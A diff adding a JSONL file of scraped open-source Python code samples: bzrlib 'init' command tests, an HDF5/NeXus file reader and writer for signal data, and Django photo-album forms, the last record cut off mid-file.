diff --git "a/3854.jsonl" "b/3854.jsonl" new file mode 100644--- /dev/null +++ "b/3854.jsonl" @@ -0,0 +1,531 @@ +{"seq_id":"909613275","text":"import os\nimport re\n\nfrom bzrlib import (\n branch as _mod_branch,\n )\nfrom bzrlib.bzrdir import BzrDirMetaFormat1\nfrom bzrlib.tests import TestSkipped\nfrom bzrlib.tests.blackbox import ExternalBase\nfrom bzrlib.tests.test_sftp_transport import TestCaseWithSFTPServer\nfrom bzrlib.workingtree import WorkingTree\n\n\nclass TestInit(ExternalBase):\n\n def test_init_with_format(self):\n # Verify bzr init --format constructs something plausible\n t = self.get_transport()\n self.run_bzr('init --format default')\n self.assertIsDirectory('.bzr', t)\n self.assertIsDirectory('.bzr/checkout', t)\n self.assertIsDirectory('.bzr/checkout/lock', t)\n\n def test_init_weave(self):\n # --format=weave should be accepted to allow interoperation with\n # old releases when desired.\n out, err = self.run_bzr('init --format=weave')\n self.assertEqual('', out)\n self.assertEqual('', err)\n\n def test_init_at_repository_root(self):\n # bzr init at the root of a repository should create a branch\n # and working tree even when creation of working trees is disabled.\n t = self.get_transport()\n t.mkdir('repo')\n format = BzrDirMetaFormat1()\n newdir = format.initialize(t.abspath('repo'))\n repo = newdir.create_repository(shared=True)\n repo.set_make_working_trees(False)\n out, err = self.run_bzr('init repo')\n self.assertEqual('', out)\n self.assertEqual('', err)\n newdir.open_branch()\n newdir.open_workingtree()\n \n def test_init_branch(self):\n out, err = self.run_bzr('init')\n self.assertEqual('', out)\n self.assertEqual('', err)\n\n # Can it handle subdirectories of branches too ?\n out, err = self.run_bzr('init subdir1')\n self.assertEqual('', out)\n self.assertEqual('', err)\n WorkingTree.open('subdir1')\n \n self.run_bzr_error(['Parent directory of subdir2/nothere does not exist'],\n 'init subdir2/nothere')\n out, err = self.run_bzr('init subdir2/nothere', retcode=3)\n self.assertEqual('', out)\n \n os.mkdir('subdir2')\n out, err = self.run_bzr('init subdir2')\n self.assertEqual('', out)\n self.assertEqual('', err)\n # init an existing branch.\n out, err = self.run_bzr('init subdir2', retcode=3)\n self.assertEqual('', out)\n self.failUnless(err.startswith('bzr: ERROR: Already a branch:'))\n\n def test_init_existing_branch(self):\n self.run_bzr('init')\n out, err = self.run_bzr('init', retcode=3)\n self.assertContainsRe(err, 'Already a branch')\n # don't suggest making a checkout, there's already a working tree\n self.assertFalse(re.search(r'checkout', err))\n\n def test_init_existing_without_workingtree(self):\n # make a repository\n repo = self.make_repository('.', shared=True)\n repo.set_make_working_trees(False)\n # make a branch; by default without a working tree\n self.run_bzr('init subdir')\n # fail\n out, err = self.run_bzr('init subdir', retcode=3)\n # suggests using checkout\n self.assertContainsRe(err,\n 'ontains a branch.*but no working tree.*checkout')\n\n def test_no_defaults(self):\n \"\"\"Init creates no default ignore rules.\"\"\"\n self.run_bzr('init')\n self.assertFalse(os.path.exists('.bzrignore'))\n\n def test_init_unicode(self):\n # Make sure getcwd can handle unicode filenames\n try:\n os.mkdir(u'mu-\\xb5')\n except UnicodeError:\n raise TestSkipped(\"Unable to create Unicode filename\")\n # try to init unicode dir\n self.run_bzr(['init', u'mu-\\xb5'])\n\n def create_simple_tree(self):\n tree = self.make_branch_and_tree('tree')\n self.build_tree(['tree/a'])\n tree.add(['a'], ['a-id'])\n tree.commit('one', rev_id='r1')\n return tree\n\n def test_init_create_prefix(self):\n \"\"\"'bzr init --create-prefix; will create leading directories.\"\"\"\n tree = self.create_simple_tree()\n\n self.run_bzr_error(['Parent directory of ../new/tree does not exist'],\n 'init ../new/tree', working_dir='tree')\n self.run_bzr('init ../new/tree --create-prefix', working_dir='tree')\n self.failUnlessExists('new/tree/.bzr')\n\n\nclass TestSFTPInit(TestCaseWithSFTPServer):\n\n def test_init(self):\n # init on a remote url should succeed.\n out, err = self.run_bzr(['init', self.get_url()])\n self.assertEqual('', out)\n self.assertEqual('', err)\n \n def test_init_existing_branch(self):\n # when there is already a branch present, make mention\n self.make_branch('.')\n\n # rely on SFTPServer get_url() pointing at '.'\n out, err = self.run_bzr_error(['Already a branch'],\n ['init', self.get_url()])\n\n # make sure using 'bzr checkout' is not suggested\n # for remote locations missing a working tree\n self.assertFalse(re.search(r'use bzr checkout', err))\n\n def test_init_existing_branch_with_workingtree(self):\n # don't distinguish between the branch having a working tree or not\n # when the branch itself is remote.\n self.make_branch_and_tree('.')\n\n # rely on SFTPServer get_url() pointing at '.'\n self.run_bzr_error(['Already a branch'], ['init', self.get_url()])\n\n def test_init_append_revisions_only(self):\n self.run_bzr('init --dirstate-tags normal_branch6')\n branch = _mod_branch.Branch.open('normal_branch6')\n self.assertEqual(False, branch._get_append_revisions_only())\n self.run_bzr('init --append-revisions-only --dirstate-tags branch6')\n branch = _mod_branch.Branch.open('branch6')\n self.assertEqual(True, branch._get_append_revisions_only())\n self.run_bzr_error(['cannot be set to append-revisions-only'],\n 'init --append-revisions-only --knit knit')\n","repo_name":"flyskywhy/cygwin","sub_path":"lib/python2.5/site-packages/bzrlib/tests/blackbox/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":6097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"8098625006","text":"from distutils.version import LooseVersion\nimport warnings\nimport logging\nimport datetime\nimport ast\n\nimport h5py\nimport numpy as np\nimport dask.array as da\nfrom traits.api import Undefined\nfrom hyperspy.misc.utils import ensure_unicode, multiply\nfrom hyperspy.axes import AxesManager\n\n_logger = logging.getLogger(__name__)\n\n\n# Plugin characteristics\n# ----------------------\nformat_name = 'NEXUS'\ndescription = \\\n 'Nexus file format based on the HDF5 standard'\n\nfull_support = False\n# Recognised file extension\nfile_extensions = ['nxs']\ndefault_extension = 0\n\n# Writing capabilities\nwrites = True\nversion = \"3.0\"\n\n# -----------------------\n# File format description\n# -----------------------\n# The root must contain a group called Experiments\n# The experiments group can contain any number of subgroups\n# Each subgroup is an experiment or signal\n# Each subgroup must contain at least one dataset called data\n# The data is an array of arbitrary dimension\n# In addition a number equal to the number of dimensions of the data\n# dataset + 1 of empty groups called coordinates followed by a number\n# must exists with the following attributes:\n# 'name'\n# 'offset'\n# 'scale'\n# 'units'\n# 'size'\n# 'index_in_array'\n# The experiment group contains a number of attributes that will be\n# directly assigned as class attributes of the Signal instance. In\n# addition the experiment groups may contain 'original_metadata' and\n# 'metadata'subgroup that will be\n# assigned to the same name attributes of the Signal instance as a\n# Dictionary Browsers\n# The Experiments group can contain attributes that may be common to all\n# the experiments and that will be accessible as attributes of the\n# Experiments instance\n#\n# CHANGES\n#\n# v3.0\n# - add Camera and Stage node\n# - move tilt_stage to Stage.tilt_alpha\n#\n# v2.2\n# - store more metadata as string: date, time, notes, authors and doi\n# - store quantity for intensity axis\n#\n# v2.1\n# - Store the navigate attribute.\n# - record_by is stored only for backward compatibility but the axes navigate\n# attribute takes precendence over record_by for files with version >= 2.1\n# v1.3\n# ----\n# - Added support for lists, tuples and binary strings\n\nnot_valid_format = 'The file is not a valid HyperSpy hdf5 file'\n\ncurrent_file_version = None # Format version of the file being read\ndefault_version = LooseVersion(version)\n\n\n\ndef file_reader(filename, backing_store=False,\n lazy=False, **kwds):\n\t\n mode = kwds.pop('mode', 'r+')\n f = h5py.File(filename, mode=mode, **kwds)\n # Getting the format version here also checks if it is a valid HSpy\n # hdf5 file, so the following two lines must not be deleted or moved\n # elsewhere.\n global current_file_version\n current_file_version = get_hspy_format_version(f)\n global default_version\n if current_file_version > default_version:\n warnings.warn(\n \"This file was written using a newer version of the \"\n \"HyperSpy hdf5 file format. I will attempt to load it, but, \"\n \"if I fail, it is likely that I will be more successful at \"\n \"this and other tasks if you upgrade me.\")\n\n models_with_signals = []\n standalone_models = []\n if 'Analysis/models' in f:\n try:\n m_gr = f.require_group('Analysis/models')\n for model_name in m_gr:\n if '_signal' in m_gr[model_name].attrs:\n key = m_gr[model_name].attrs['_signal']\n # del m_gr[model_name].attrs['_signal']\n res = hdfgroup2dict(\n m_gr[model_name],\n lazy=lazy)\n del res['_signal']\n models_with_signals.append((key, {model_name: res}))\n else:\n standalone_models.append(\n {model_name: hdfgroup2dict(\n m_gr[model_name], lazy=lazy)})\n except TypeError:\n raise IOError(not_valid_format)\n\n experiments = []\n exp_dict_list = []\n if 'Experiments' in f:\n for ds in f['Experiments']:\n if isinstance(f['Experiments'][ds], h5py.Group):\n if 'data' in f['Experiments'][ds]:\n experiments.append(ds)\n # Parse the file\n for experiment in experiments:\n exg = f['Experiments'][experiment]\n exp = hdfgroup2signaldict(exg, lazy)\n # assign correct models, if found:\n _tmp = {}\n for (key, _dict) in reversed(models_with_signals):\n if key == exg.name:\n _tmp.update(_dict)\n models_with_signals.remove((key, _dict))\n exp['models'] = _tmp\n\n exp_dict_list.append(exp)\n\n for _, m in models_with_signals:\n standalone_models.append(m)\n\n exp_dict_list.extend(standalone_models)\n if not len(exp_dict_list):\n raise IOError('This is not a valid HyperSpy HDF5 file. '\n 'You can still load the data using a hdf5 reader, '\n 'e.g. h5py, and manually create a Signal. '\n 'Please, refer to the User Guide for details')\n if not lazy:\n f.close()\n return exp_dict_list\n\n\ndef hdfgroup2signaldict(group, lazy=False):\n global current_file_version\n global default_version\n if current_file_version < LooseVersion(\"1.2\"):\n metadata = \"mapped_parameters\"\n original_metadata = \"original_parameters\"\n else:\n metadata = \"metadata\"\n original_metadata = \"original_metadata\"\n\n exp = {'metadata': hdfgroup2dict(\n group[metadata], lazy=lazy),\n 'original_metadata': hdfgroup2dict(\n group[original_metadata], lazy=lazy),\n 'attributes': {}\n }\n\n data = group['data']\n if lazy:\n data = da.from_array(data, chunks=data.chunks)\n exp['attributes']['_lazy'] = True\n else:\n data = np.asanyarray(data)\n exp['data'] = data\n axes = []\n for i in range(len(exp['data'].shape)):\n try:\n axes.append(dict(group['axis-%i' % i].attrs))\n axis = axes[-1]\n for key, item in axis.items():\n if isinstance(item, np.bool_):\n axis[key] = bool(item)\n else:\n axis[key] = ensure_unicode(item)\n except KeyError:\n break\n if len(axes) != len(exp['data'].shape): # broke from the previous loop\n try:\n axes = [i for k, i in sorted(iter(hdfgroup2dict(\n group['_list_' + str(len(exp['data'].shape)) + '_axes'],\n lazy=lazy).items()))]\n except KeyError:\n raise IOError(not_valid_format)\n exp['axes'] = axes\n if 'learning_results' in group.keys():\n exp['attributes']['learning_results'] = \\\n hdfgroup2dict(\n group['learning_results'],\n lazy=lazy)\n if 'peak_learning_results' in group.keys():\n exp['attributes']['peak_learning_results'] = \\\n hdfgroup2dict(\n group['peak_learning_results'],\n lazy=lazy)\n\n # If the title was not defined on writing the Experiment is\n # then called __unnamed__. The next \"if\" simply sets the title\n # back to the empty string\n if \"General\" in exp[\"metadata\"] and \"title\" in exp[\"metadata\"][\"General\"]:\n if '__unnamed__' == exp['metadata']['General']['title']:\n exp['metadata'][\"General\"]['title'] = ''\n\n if current_file_version < LooseVersion(\"1.1\"):\n # Load the decomposition results written with the old name,\n # mva_results\n if 'mva_results' in group.keys():\n exp['attributes']['learning_results'] = hdfgroup2dict(\n group['mva_results'], lazy=lazy)\n if 'peak_mva_results' in group.keys():\n exp['attributes']['peak_learning_results'] = hdfgroup2dict(\n group['peak_mva_results'], lazy=lazy)\n # Replace the old signal and name keys with their current names\n if 'signal' in exp['metadata']:\n if \"Signal\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Signal\"] = {}\n exp['metadata'][\"Signal\"]['signal_type'] = \\\n exp['metadata']['signal']\n del exp['metadata']['signal']\n\n if 'name' in exp['metadata']:\n if \"General\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"General\"] = {}\n exp['metadata']['General']['title'] = \\\n exp['metadata']['name']\n del exp['metadata']['name']\n\n if current_file_version < LooseVersion(\"1.2\"):\n if '_internal_parameters' in exp['metadata']:\n exp['metadata']['_HyperSpy'] = \\\n exp['metadata']['_internal_parameters']\n del exp['metadata']['_internal_parameters']\n if 'stacking_history' in exp['metadata']['_HyperSpy']:\n exp['metadata']['_HyperSpy'][\"Stacking_history\"] = \\\n exp['metadata']['_HyperSpy']['stacking_history']\n del exp['metadata']['_HyperSpy'][\"stacking_history\"]\n if 'folding' in exp['metadata']['_HyperSpy']:\n exp['metadata']['_HyperSpy'][\"Folding\"] = \\\n exp['metadata']['_HyperSpy']['folding']\n del exp['metadata']['_HyperSpy'][\"folding\"]\n if 'Variance_estimation' in exp['metadata']:\n if \"Noise_properties\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Noise_properties\"] = {}\n exp['metadata']['Noise_properties'][\"Variance_linear_model\"] = \\\n exp['metadata']['Variance_estimation']\n del exp['metadata']['Variance_estimation']\n if \"TEM\" in exp[\"metadata\"]:\n if \"Acquisition_instrument\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Acquisition_instrument\"] = {}\n exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"] = \\\n exp[\"metadata\"][\"TEM\"]\n del exp[\"metadata\"][\"TEM\"]\n tem = exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"]\n if \"EELS\" in tem:\n if \"dwell_time\" in tem:\n tem[\"EELS\"][\"dwell_time\"] = tem[\"dwell_time\"]\n del tem[\"dwell_time\"]\n if \"dwell_time_units\" in tem:\n tem[\"EELS\"][\"dwell_time_units\"] = tem[\"dwell_time_units\"]\n del tem[\"dwell_time_units\"]\n if \"exposure\" in tem:\n tem[\"EELS\"][\"exposure\"] = tem[\"exposure\"]\n del tem[\"exposure\"]\n if \"exposure_units\" in tem:\n tem[\"EELS\"][\"exposure_units\"] = tem[\"exposure_units\"]\n del tem[\"exposure_units\"]\n if \"Detector\" not in tem:\n tem[\"Detector\"] = {}\n tem[\"Detector\"] = tem[\"EELS\"]\n del tem[\"EELS\"]\n if \"EDS\" in tem:\n if \"Detector\" not in tem:\n tem[\"Detector\"] = {}\n if \"EDS\" not in tem[\"Detector\"]:\n tem[\"Detector\"][\"EDS\"] = {}\n tem[\"Detector\"][\"EDS\"] = tem[\"EDS\"]\n del tem[\"EDS\"]\n del tem\n if \"SEM\" in exp[\"metadata\"]:\n if \"Acquisition_instrument\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Acquisition_instrument\"] = {}\n exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"] = \\\n exp[\"metadata\"][\"SEM\"]\n del exp[\"metadata\"][\"SEM\"]\n sem = exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"]\n if \"EDS\" in sem:\n if \"Detector\" not in sem:\n sem[\"Detector\"] = {}\n if \"EDS\" not in sem[\"Detector\"]:\n sem[\"Detector\"][\"EDS\"] = {}\n sem[\"Detector\"][\"EDS\"] = sem[\"EDS\"]\n del sem[\"EDS\"]\n del sem\n\n if \"Sample\" in exp[\"metadata\"] and \"Xray_lines\" in exp[\n \"metadata\"][\"Sample\"]:\n exp[\"metadata\"][\"Sample\"][\"xray_lines\"] = exp[\n \"metadata\"][\"Sample\"][\"Xray_lines\"]\n del exp[\"metadata\"][\"Sample\"][\"Xray_lines\"]\n\n for key in [\"title\", \"date\", \"time\", \"original_filename\"]:\n if key in exp[\"metadata\"]:\n if \"General\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"General\"] = {}\n exp[\"metadata\"][\"General\"][key] = exp[\"metadata\"][key]\n del exp[\"metadata\"][key]\n for key in [\"record_by\", \"signal_origin\", \"signal_type\"]:\n if key in exp[\"metadata\"]:\n if \"Signal\" not in exp[\"metadata\"]:\n exp[\"metadata\"][\"Signal\"] = {}\n exp[\"metadata\"][\"Signal\"][key] = exp[\"metadata\"][key]\n del exp[\"metadata\"][key]\n\n if current_file_version < LooseVersion(\"3.0\"):\n if \"Acquisition_instrument\" in exp[\"metadata\"]:\n # Move tilt_stage to Stage.tilt_alpha\n # Move exposure time to Detector.Camera.exposure_time\n if \"TEM\" in exp[\"metadata\"][\"Acquisition_instrument\"]:\n tem = exp[\"metadata\"][\"Acquisition_instrument\"][\"TEM\"]\n exposure = None\n if \"tilt_stage\" in tem:\n tem[\"Stage\"] = {\"tilt_alpha\": tem[\"tilt_stage\"]}\n del tem[\"tilt_stage\"]\n if \"exposure\" in tem:\n exposure = \"exposure\"\n # Digital_micrograph plugin was parsing to 'exposure_time'\n # instead of 'exposure': need this to be compatible with\n # previous behaviour\n if \"exposure_time\" in tem:\n exposure = \"exposure_time\"\n if exposure is not None:\n if \"Detector\" not in tem:\n tem[\"Detector\"] = {\"Camera\": {\n \"exposure\": tem[exposure]}}\n tem[\"Detector\"][\"Camera\"] = {\"exposure\": tem[exposure]}\n del tem[exposure]\n # Move tilt_stage to Stage.tilt_alpha\n if \"SEM\" in exp[\"metadata\"][\"Acquisition_instrument\"]:\n sem = exp[\"metadata\"][\"Acquisition_instrument\"][\"SEM\"]\n if \"tilt_stage\" in sem:\n sem[\"Stage\"] = {\"tilt_alpha\": sem[\"tilt_stage\"]}\n del sem[\"tilt_stage\"]\n\n return exp\n\n\ndef dict2hdfgroup(dictionary, group, **kwds):\n from hyperspy.misc.utils import DictionaryTreeBrowser\n from hyperspy.signal import BaseSignal\n\n def parse_structure(key, group, value, _type, **kwds):\n try:\n # Here we check if there are any signals in the container, as\n # casting a long list of signals to a numpy array takes a very long\n # time. So we check if there are any, and save numpy the trouble\n if np.any([isinstance(t, BaseSignal) for t in value]):\n tmp = np.array([[0]])\n else:\n tmp = np.array(value)\n except ValueError:\n tmp = np.array([[0]])\n if tmp.dtype is np.dtype('O') or tmp.ndim is not 1:\n dict2hdfgroup(dict(zip(\n [str(i) for i in range(len(value))], value)),\n group.create_group(_type + str(len(value)) + '_' + key),\n **kwds)\n elif tmp.dtype.type is np.unicode_:\n if _type + key in group:\n del group[_type + key]\n group.create_dataset(_type + key,\n tmp.shape,\n dtype=h5py.special_dtype(vlen=str),\n **kwds)\n group[_type + key][:] = tmp[:]\n else:\n if _type + key in group:\n del group[_type + key]\n group.create_dataset(\n _type + key,\n data=tmp,\n **kwds)\n\n for key, value in dictionary.items():\n if isinstance(value, dict):\n dict2hdfgroup(value, group.create_group(key),\n **kwds)\n elif isinstance(value, DictionaryTreeBrowser):\n dict2hdfgroup(value.as_dictionary(),\n group.create_group(key),\n **kwds)\n elif isinstance(value, BaseSignal):\n kn = key if key.startswith('_sig_') else '_sig_' + key\n write_signal(value, group.require_group(kn))\n elif isinstance(value, (np.ndarray, h5py.Dataset, da.Array)):\n overwrite_dataset(group, value, key, **kwds)\n elif value is None:\n group.attrs[key] = '_None_'\n elif isinstance(value, bytes):\n try:\n # binary string if has any null characters (otherwise not\n # supported by hdf5)\n value.index(b'\\x00')\n group.attrs['_bs_' + key] = np.void(value)\n except ValueError:\n group.attrs[key] = value.decode()\n elif isinstance(value, str):\n group.attrs[key] = value\n elif isinstance(value, AxesManager):\n dict2hdfgroup(value.as_dictionary(),\n group.create_group('_hspy_AxesManager_' + key),\n **kwds)\n elif isinstance(value, list):\n if len(value):\n parse_structure(key, group, value, '_list_', **kwds)\n else:\n group.attrs['_list_empty_' + key] = '_None_'\n elif isinstance(value, tuple):\n if len(value):\n parse_structure(key, group, value, '_tuple_', **kwds)\n else:\n group.attrs['_tuple_empty_' + key] = '_None_'\n\n elif value is Undefined:\n continue\n else:\n try:\n group.attrs[key] = value\n except:\n _logger.exception(\n \"The hdf5 writer could not write the following \"\n \"information in the file: %s : %s\", key, value)\n\n\ndef get_signal_chunks(shape, dtype, signal_axes=None):\n \"\"\"Function that claculates chunks for the signal, preferably at least one\n chunk per signal space.\n\n Parameters\n ----------\n shape : tuple\n the shape of the dataset to be sored / chunked\n dtype : {dtype, string}\n the numpy dtype of the data\n signal_axes: {None, iterable of ints}\n the axes defining \"signal space\" of the dataset. If None, the default\n h5py chunking is performed.\n \"\"\"\n typesize = np.dtype(dtype).itemsize\n if signal_axes is None:\n return h5py._hl.filters.guess_chunk(shape, None, typesize)\n\n # largely based on the guess_chunk in h5py\n CHUNK_MAX = 1024 * 1024\n want_to_keep = multiply([shape[i] for i in signal_axes]) * typesize\n if want_to_keep >= CHUNK_MAX:\n chunks = [1 for _ in shape]\n for i in signal_axes:\n chunks[i] = shape[i]\n return tuple(chunks)\n\n chunks = [i for i in shape]\n idx = 0\n navigation_axes = tuple(i for i in range(len(shape)) if i not in\n signal_axes)\n nchange = len(navigation_axes)\n while True:\n chunk_bytes = multiply(chunks) * typesize\n\n if chunk_bytes < CHUNK_MAX:\n break\n\n if multiply([chunks[i] for i in navigation_axes]) == 1:\n break\n change = navigation_axes[idx % nchange]\n chunks[change] = np.ceil(chunks[change] / 2.0)\n idx += 1\n return tuple(int(x) for x in chunks)\n\n\ndef overwrite_dataset(group, data, key, signal_axes=None, **kwds):\n if signal_axes is None:\n chunks = True\n else:\n chunks = get_signal_chunks(data.shape, data.dtype, signal_axes)\n\n maxshape = tuple(None for _ in data.shape)\n\n got_data = False\n while not got_data:\n try:\n these_kwds = kwds.copy()\n these_kwds.update(dict(shape=data.shape,\n dtype=data.dtype,\n exact=True,\n maxshape=maxshape,\n chunks=chunks,\n shuffle=True,))\n\n dset = group.require_dataset(key, **these_kwds)\n got_data = True\n except TypeError:\n # if the shape or dtype/etc do not match,\n # we delete the old one and create new in the next loop run\n del group[key]\n if dset == data:\n # just a reference to already created thing\n pass\n else:\n if isinstance(data, da.Array):\n da.store(data.rechunk(dset.chunks), dset)\n else:\n da.store(da.from_array(data, chunks=dset.chunks), dset)\n\n\ndef hdfgroup2dict(group, dictionary=None, lazy=False):\n if dictionary is None:\n dictionary = {}\n for key, value in group.attrs.items():\n if isinstance(value, bytes):\n value = value.decode()\n if isinstance(value, (np.string_, str)):\n if value == '_None_':\n value = None\n elif isinstance(value, np.bool_):\n value = bool(value)\n elif isinstance(value, np.ndarray) and value.dtype.char == \"S\":\n # Convert strings to unicode\n value = value.astype(\"U\")\n if value.dtype.str.endswith(\"U1\"):\n value = value.tolist()\n # skip signals - these are handled below.\n if key.startswith('_sig_'):\n pass\n elif key.startswith('_list_empty_'):\n dictionary[key[len('_list_empty_'):]] = []\n elif key.startswith('_tuple_empty_'):\n dictionary[key[len('_tuple_empty_'):]] = ()\n elif key.startswith('_bs_'):\n dictionary[key[len('_bs_'):]] = value.tostring()\n # The following two elif stataments enable reading date and time from\n # v < 2 of HyperSpy's metadata specifications\n elif key.startswith('_datetime_date'):\n date_iso = datetime.date(\n *ast.literal_eval(value[value.index(\"(\"):])).isoformat()\n dictionary[key.replace(\"_datetime_\", \"\")] = date_iso\n elif key.startswith('_datetime_time'):\n date_iso = datetime.time(\n *ast.literal_eval(value[value.index(\"(\"):])).isoformat()\n dictionary[key.replace(\"_datetime_\", \"\")] = date_iso\n else:\n dictionary[key] = value\n if not isinstance(group, h5py.Dataset):\n for key in group.keys():\n if key.startswith('_sig_'):\n from hyperspy.io import dict2signal\n dictionary[key[len('_sig_'):]] = (\n dict2signal(hdfgroup2signaldict(\n group[key], lazy=lazy)))\n elif isinstance(group[key], h5py.Dataset):\n dat = group[key]\n kn = key\n if key.startswith(\"_list_\"):\n ans = np.array(dat)\n ans = ans.tolist()\n kn = key[6:]\n elif key.startswith(\"_tuple_\"):\n ans = np.array(dat)\n ans = tuple(ans.tolist())\n kn = key[7:]\n elif dat.dtype.char == \"S\":\n ans = np.array(dat)\n try:\n ans = ans.astype(\"U\")\n except UnicodeDecodeError:\n # There are some strings that must stay in binary,\n # for example dill pickles. This will obviously also\n # let \"wrong\" binary string fail somewhere else...\n pass\n elif lazy:\n ans = da.from_array(dat, chunks=dat.chunks)\n else:\n ans = np.array(dat)\n dictionary[kn] = ans\n elif key.startswith('_hspy_AxesManager_'):\n dictionary[key[len('_hspy_AxesManager_'):]] = AxesManager(\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))])\n elif key.startswith('_list_'):\n dictionary[key[7 + key[6:].find('_'):]] = \\\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))]\n elif key.startswith('_tuple_'):\n dictionary[key[8 + key[7:].find('_'):]] = tuple(\n [i for k, i in sorted(iter(\n hdfgroup2dict(\n group[key], lazy=lazy).items()\n ))])\n else:\n dictionary[key] = {}\n hdfgroup2dict(\n group[key],\n dictionary[key],\n lazy=lazy)\n return dictionary\n\n\ndef write_signal(signal, group, **kwds):\n if default_version < LooseVersion(\"1.2\"):\n metadata = \"mapped_parameters\"\n original_metadata = \"original_parameters\"\n else:\n metadata = \"metadata\"\n original_metadata = \"original_metadata\"\n if 'compression' not in kwds:\n kwds['compression'] = 'gzip'\n\n for axis in signal.axes_manager._axes:\n axis_dict = axis.get_axis_dictionary()\n coord_group = group.create_group(\n 'axis-%s' % axis.index_in_array)\n dict2hdfgroup(axis_dict, coord_group, **kwds)\n mapped_par = group.create_group(metadata)\n metadata_dict = signal.metadata.as_dictionary()\n overwrite_dataset(group, signal.data, 'data',\n signal_axes=signal.axes_manager.signal_indices_in_array,\n **kwds)\n if default_version < LooseVersion(\"1.2\"):\n metadata_dict[\"_internal_parameters\"] = \\\n metadata_dict.pop(\"_HyperSpy\")\n dict2hdfgroup(metadata_dict, mapped_par, **kwds)\n original_par = group.create_group(original_metadata)\n dict2hdfgroup(signal.original_metadata.as_dictionary(), original_par,\n **kwds)\n learning_results = group.create_group('learning_results')\n dict2hdfgroup(signal.learning_results.__dict__,\n learning_results, **kwds)\n if hasattr(signal, 'peak_learning_results'):\n peak_learning_results = group.create_group(\n 'peak_learning_results')\n dict2hdfgroup(signal.peak_learning_results.__dict__,\n peak_learning_results, **kwds)\n\n if len(signal.models):\n model_group = group.file.require_group('Analysis/models')\n dict2hdfgroup(signal.models._models.as_dictionary(),\n model_group, **kwds)\n for model in model_group.values():\n model.attrs['_signal'] = group.name\n\n\ndef file_writer(filename,\n signal,\n *args, **kwds):\n with h5py.File(filename, mode='w') as f:\n f.attrs['file_format'] = \"HyperSpy\"\n f.attrs['file_format_version'] = version\n exps = f.create_group('Experiments')\n group_name = signal.metadata.General.title if \\\n signal.metadata.General.title else '__unnamed__'\n # / is a invalid character, see #942\n if \"/\" in group_name:\n group_name = group_name.replace(\"/\", \"-\")\n expg = exps.create_group(group_name)\n if 'compression' not in kwds:\n kwds['compression'] = 'gzip'\n # Add record_by metadata for backward compatibility\n smd = signal.metadata.Signal\n if signal.axes_manager.signal_dimension == 1:\n smd.record_by = \"spectrum\"\n elif signal.axes_manager.signal_dimension == 2:\n smd.record_by = \"image\"\n else:\n smd.record_by = \"\"\n try:\n write_signal(signal, expg, **kwds)\n except:\n raise\n finally:\n del smd.record_by\n","repo_name":"pquinn-dls/flupy","sub_path":"flupy/wrappers/hyperspy/io_plugins/nexus.py","file_name":"nexus.py","file_ext":"py","file_size_in_byte":27785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34957594437","text":"import os\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.bootstrap import FieldWithButtons\nfrom crispy_forms.layout import Layout, Submit, Div, Field\n\nfrom photo.models import Album\n\n\nclass ScanFolderForm(forms.Form):\n directory = forms.CharField(\n required=True,\n error_messages={'required': _('Please enter a directory')},)\n default_date = forms.DateField(\n required=True,\n error_messages={'required': _('Please enter a default date')},)\n default_tags = forms.CharField(\n required=False,\n error_messages={'required':\n _('Please enter at least one tag')},)\n\n def __init__(self, *args, **kwargs):\n super(ScanFolderForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_action = reverse('photo_scan')\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'directory',\n 'default_date',\n 'default_tags',\n Div(\n Submit('submit', _(u'Upload'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(ScanFolderForm, self).clean()\n directory = cleaned_data.get(\"directory\")\n # Check directory exists\n if not os.path.isdir(settings.PHOTO_ROOT + directory):\n raise forms.ValidationError(_(\"Directory does not exist\"))\n\n return cleaned_data\n\n\nclass EditPhotoForm(forms.Form):\n title = forms.CharField(\n required=False,)\n tags = forms.CharField(\n required=True,\n error_messages={'required':\n _('Please enter at least one tag')},)\n date = forms.DateTimeField(\n required=True,\n error_messages={'required': _('Please enter a valid date'),\n 'invalid': _('Please enter a valid date')},)\n\n def __init__(self, *args, **kwargs):\n super(EditPhotoForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.label_class = 'col-lg-2'\n self.helper.field_class = 'col-lg-4'\n self.helper.layout = Layout(\n 'title',\n 'tags',\n Div('date', css_class='date-picker-row-fluid'),\n Div(\n Submit('submit', _(u'Update'), css_class='btn btn-default'),\n css_class='col-lg-offset-2 col-lg-4',\n ),\n )\n\n def clean(self):\n cleaned_data = super(EditPhotoForm, self).clean()\n return cleaned_data\n\n\nclass SearchForm(forms.Form):\n q = forms.CharField(\n required=True,\n error_messages={'required':\n _(u'Please enter something to search for')},)\n\n def __init__(self, *args, **kwargs):\n super(SearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_show_labels = False\n self.helper.form_method = \"GET\"\n self.helper.form_class = 'form-horizontal'\n self.helper.field_class = 'col-lg-8'\n self.helper.layout = Layout(\n FieldWithButtons('q', Submit('submit', _(u'Go'),\n css_class='btn btn-default')),\n\n )\n\n\nclass UpdateTagsForm(forms.Form):\n UPDATE_ACTIONS = (('add', _(u'Add Tag/s')),\n ('delete', _(u'Delete Tag/s')),\n 